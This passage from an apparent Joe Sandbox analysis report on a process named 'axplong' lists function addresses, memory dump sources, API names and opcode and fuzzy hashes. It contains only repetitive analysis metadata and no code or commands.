                                                                                                                                                                  • Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                  • Opcode ID: b07a4a61f56ee3378b059925ce01a9dfadbdacd5df8ccfcfedf043956abeec0e
                                                                                                                                                                  • Instruction ID: 952eb49cd5420caf4aa3e99fbfaf597cba9f5feb5687313154cd64a60dd21556
                                                                                                                                                                  • Opcode Fuzzy Hash: b07a4a61f56ee3378b059925ce01a9dfadbdacd5df8ccfcfedf043956abeec0e
                                                                                                                                                                  • Instruction Fuzzy Hash: BAE02B7E20A1115BDB2032E76C0175E358C8F413B3F150351AC24A6081CF20DDC856FF
                                                                                                                                                                  Function 00C36AE0 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                                                  • Opcode ID: ec96bdf9b012aceb955d2efeab912cca6d7655daec8441a0c86b3fb87eee7ab7
                                                                                                                                                                  • Instruction ID: 1a3ed5ec09eb94a2187a51ef15ae1f7d4f959e1d1b416107c2ef8cee2f62f706
                                                                                                                                                                  • Opcode Fuzzy Hash: ec96bdf9b012aceb955d2efeab912cca6d7655daec8441a0c86b3fb87eee7ab7
                                                                                                                                                                  • Instruction Fuzzy Hash: ADF0A471E10618ABC710BB799D0BB1EBB75AB06B64F900358E811672E1DB345A009BD7
                                                                                                                                                                  Function 04EF0BD5 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3025816737.0000000004EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_4ef0000_axplong.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: a9fa31e998c1ca24222d42d8bb8d99740caecae27257d989a3c1ef1ee81063d2
                                                                                                                                                                  • Instruction ID: fb9ae49d0019ad3a7ac30c26acf661776edd186e3bc34eb39313abdff77e6af2
                                                                                                                                                                  • Opcode Fuzzy Hash: a9fa31e998c1ca24222d42d8bb8d99740caecae27257d989a3c1ef1ee81063d2
                                                                                                                                                                  • Instruction Fuzzy Hash: 491156E728E114BEE14256959F40AFB3B6EE7C33303309462F603CA643F2851A8D7131
                                                                                                                                                                  Function 04EF0BCC Relevance: .1, Instructions: 91COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3025816737.0000000004EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_4ef0000_axplong.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 31d09367c8a41ba6e1a48b80e5979221a3671a6d920f08b76ad73b40750b64eb
                                                                                                                                                                  • Instruction ID: d597852dab33c052a5f81ed22aad90ab06070f3f15a001d2f5f58598cc85b8ad
                                                                                                                                                                  • Opcode Fuzzy Hash: 31d09367c8a41ba6e1a48b80e5979221a3671a6d920f08b76ad73b40750b64eb
                                                                                                                                                                  • Instruction Fuzzy Hash: 2B11E5EB28E114BDE04251855F00AFA3A6EE3C33703309462F643DA643F2D91A4A3032
                                                                                                                                                                  Function 04EF0C42 Relevance: .1, Instructions: 85COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3025816737.0000000004EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_4ef0000_axplong.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 8c3a5df10aa232f4e6cca0b3e20aafb3a78c1e68013797fbc74bdad2a8727ced
                                                                                                                                                                  • Instruction ID: ad321343049497bd84db370d27e175700fd960057ce4f0524100a4f75e35ae74
                                                                                                                                                                  • Opcode Fuzzy Hash: 8c3a5df10aa232f4e6cca0b3e20aafb3a78c1e68013797fbc74bdad2a8727ced
                                                                                                                                                                  • Instruction Fuzzy Hash: 391129E714E2D07EE24346805F549F73F6DEAC373033094ABFA42D9443E286194DA232
                                                                                                                                                                  Function 04EF0C08 Relevance: .1, Instructions: 85COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3025816737.0000000004EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_4ef0000_axplong.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: df55895a31e140ba9855bfb515763e57ebd5a14eb181c1dc601fd23a97edf13e
                                                                                                                                                                  • Instruction ID: d5ce33e0f25fa9ce259483366c584ddcb2c619665d07b9ae21f864575a91304e
                                                                                                                                                                  • Opcode Fuzzy Hash: df55895a31e140ba9855bfb515763e57ebd5a14eb181c1dc601fd23a97edf13e
                                                                                                                                                                  • Instruction Fuzzy Hash: 9F01C4EB249114BDB15255855F00AFB7A6EE3C3770730D562FA43DA503F2D91A8E7132
                                                                                                                                                                  Function 04EF0C0D Relevance: .1, Instructions: 83COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3025816737.0000000004EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_4ef0000_axplong.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: d368eebe6f68036f85cddd2a963726ab8899868e510558dd3cbecd5ae5ac5ae2
                                                                                                                                                                  • Instruction ID: 6e8f06aac04101c70a9a263258f943549e0744ec8650814763bae18b4894c923
                                                                                                                                                                  • Opcode Fuzzy Hash: d368eebe6f68036f85cddd2a963726ab8899868e510558dd3cbecd5ae5ac5ae2
                                                                                                                                                                  • Instruction Fuzzy Hash: C501C4EB249114BDF15256859F04AFB7A6EE3C37303309562FA43D6903F29A1A4A3531
                                                                                                                                                                  Function 04EF0C01 Relevance: .1, Instructions: 83COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3025816737.0000000004EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_4ef0000_axplong.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 84e95ffedcb10b9f5148371b895db9ec0b119abc71587d96cfd231c7208ce68c
                                                                                                                                                                  • Instruction ID: 80eed5f69ee3bda829d91b5bc7716ebe46ba4c27112c7a85f587dfef704f160f
                                                                                                                                                                  • Opcode Fuzzy Hash: 84e95ffedcb10b9f5148371b895db9ec0b119abc71587d96cfd231c7208ce68c
                                                                                                                                                                  • Instruction Fuzzy Hash: 680180EB28E114BDE15255815F04AFA7A6EE3C37707309462FA43DA943F2991A8A3172
                                                                                                                                                                  Function 04EF0C28 Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3025816737.0000000004EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_4ef0000_axplong.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 0748c06108ecf51ee0b28d846d156d40d7c315dea252df39ba5e6e772221c545
                                                                                                                                                                  • Instruction ID: c6e77722029fe285b9eec736d6ba49c92e04a2a7dcbd99824151e7385b651f0e
                                                                                                                                                                  • Opcode Fuzzy Hash: 0748c06108ecf51ee0b28d846d156d40d7c315dea252df39ba5e6e772221c545
                                                                                                                                                                  • Instruction Fuzzy Hash: 6601D2EA24D114BEF14252815F10AFB3B6DE7C2730730D462FA43D6943F2951A8A3032
                                                                                                                                                                  Function 04EF0C6C Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3025816737.0000000004EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_4ef0000_axplong.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 7154f79c0309f9defa2ab798ebd5732645925e1cefcd855fc587b53de45815df
                                                                                                                                                                  • Instruction ID: a6e871d9c2d491f1e770cee48d669d40ce3784b743e44ee79ea589f7ceb6d958
                                                                                                                                                                  • Opcode Fuzzy Hash: 7154f79c0309f9defa2ab798ebd5732645925e1cefcd855fc587b53de45815df
                                                                                                                                                                  • Instruction Fuzzy Hash: 950176EB14D1503CF15181916F50BFB2B6ED2C37303309866F662C9543F28A0A8F3032
                                                                                                                                                                  Function 04EF0CC8 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3025816737.0000000004EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_4ef0000_axplong.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 6e1bdbedac3590ccd103d7bb70eac6cd70546ba86ad1f15044cf394323b01d3e
                                                                                                                                                                  • Instruction ID: c443918e0d4318f6237066fb7bd21700958f59594c5e7b5793c0ff9061e3e271
                                                                                                                                                                  • Opcode Fuzzy Hash: 6e1bdbedac3590ccd103d7bb70eac6cd70546ba86ad1f15044cf394323b01d3e
                                                                                                                                                                  • Instruction Fuzzy Hash: 630126AB28E2906EF14291912F206F76B6EE6D3330330D876F542C5943F2891A8E6532
                                                                                                                                                                  Function 04EF0C7F Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3025816737.0000000004EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_4ef0000_axplong.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: e21786e30370b737808f9fa8353aef6e255bd79063c27a2837e6953c8d64e857
                                                                                                                                                                  • Instruction ID: a9094aa8d0ac9dc76fb21c2422b09775f208246dd15af7ac448ea46d4fe15cca
                                                                                                                                                                  • Opcode Fuzzy Hash: e21786e30370b737808f9fa8353aef6e255bd79063c27a2837e6953c8d64e857
                                                                                                                                                                  • Instruction Fuzzy Hash: 42F0C2EB24D1507DB14191916F14AFB6B6ED1C3B30330D826F542D4902F2890A8E2032
                                                                                                                                                                  Function 04EF0CAD Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3025816737.0000000004EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_4ef0000_axplong.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 1264c252b12c59b031de983d3a21b0b8db1f594b7f88df3ddbe7a3c532630d7b
                                                                                                                                                                  • Instruction ID: cff371d867c5717c0a25ec8da6271b894ce6bec96bb3e2bb9fc02483d3cf02c3
                                                                                                                                                                  • Opcode Fuzzy Hash: 1264c252b12c59b031de983d3a21b0b8db1f594b7f88df3ddbe7a3c532630d7b
                                                                                                                                                                  • Instruction Fuzzy Hash: B3E0D8EB28D1507EF09150C66F106FB6B2EE2C3730730D423F603D5903A2890A8E7532

                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                  Function 00C63068 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __floor_pentium4
                                                                                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                  • API String ID: 4168288129-2761157908
                                                                                                                                                                  • Opcode ID: fd94ec257c4ef1f8f79f991d1e00500fec44af56488bef84bd532ff6f6f00b4c
                                                                                                                                                                  • Instruction ID: 8e5facb346fc1b9805d67edbcc1cd86b19e51be10ab6bb3fa4d008890169640e
                                                                                                                                                                  • Opcode Fuzzy Hash: fd94ec257c4ef1f8f79f991d1e00500fec44af56488bef84bd532ff6f6f00b4c
                                                                                                                                                                  • Instruction Fuzzy Hash: 12C22A71E086688FDB35CE28DD807E9B7B5EB88305F1441EAD85EA7240E775AF858F40
                                                                                                                                                                  Function 00C62BD0 Relevance: 3.4, APIs: 2, Instructions: 450COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                                                                                                                                                                  • Instruction ID: 0a3619b6f9b28251f74e96c092945c8c3b56f75a32eef69ccae1815cddc35dfe
                                                                                                                                                                  • Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                                                                                                                                                                  • Instruction Fuzzy Hash: 2AF13E71E006199FDF24CFA9C9C06ADB7B1FF48314F158269E825AB345D731AE45CB90
                                                                                                                                                                  Function 00C3CB1A Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSystemTimePreciseAsFileTime.KERNEL32(?,00C3CE82,?,?,?,?,00C3CEB7,?,?,?,?,?,?,00C3C42D,?,00000001), ref: 00C3CB33
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Time$FilePreciseSystem
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1802150274-0
                                                                                                                                                                  • Opcode ID: 898d4d5f811a73da8fb3da5e1f500540fba2558353d45b7e90cf1a6112bbbd6c
                                                                                                                                                                  • Instruction ID: 0f1a00491a1efc5f47303027fdb4e6ef491245013f506c9664500fa17c2b0d94
                                                                                                                                                                  • Opcode Fuzzy Hash: 898d4d5f811a73da8fb3da5e1f500540fba2558353d45b7e90cf1a6112bbbd6c
                                                                                                                                                                  • Instruction Fuzzy Hash: E7D0223251203893CB012B90AC05AADFB089B04B98B000211E808772208A527C804BD4
                                                                                                                                                                  Function 00C57D83 Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 0
                                                                                                                                                                  • API String ID: 0-4108050209
                                                                                                                                                                  • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                                                                                                                                                  • Instruction ID: a78ab78ad72cb5272ad00d125b3ca256b4b604d580073614d78f2896fcce820b
                                                                                                                                                                  • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                                                                                                                                                  • Instruction Fuzzy Hash: 4051B77C20C7085ECB388A29A9977BE67AA9F11303F140759DC62D7682CA919FCD830D
                                                                                                                                                                  Function 00C24CF0 Relevance: .7, Instructions: 701COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmpDownload File
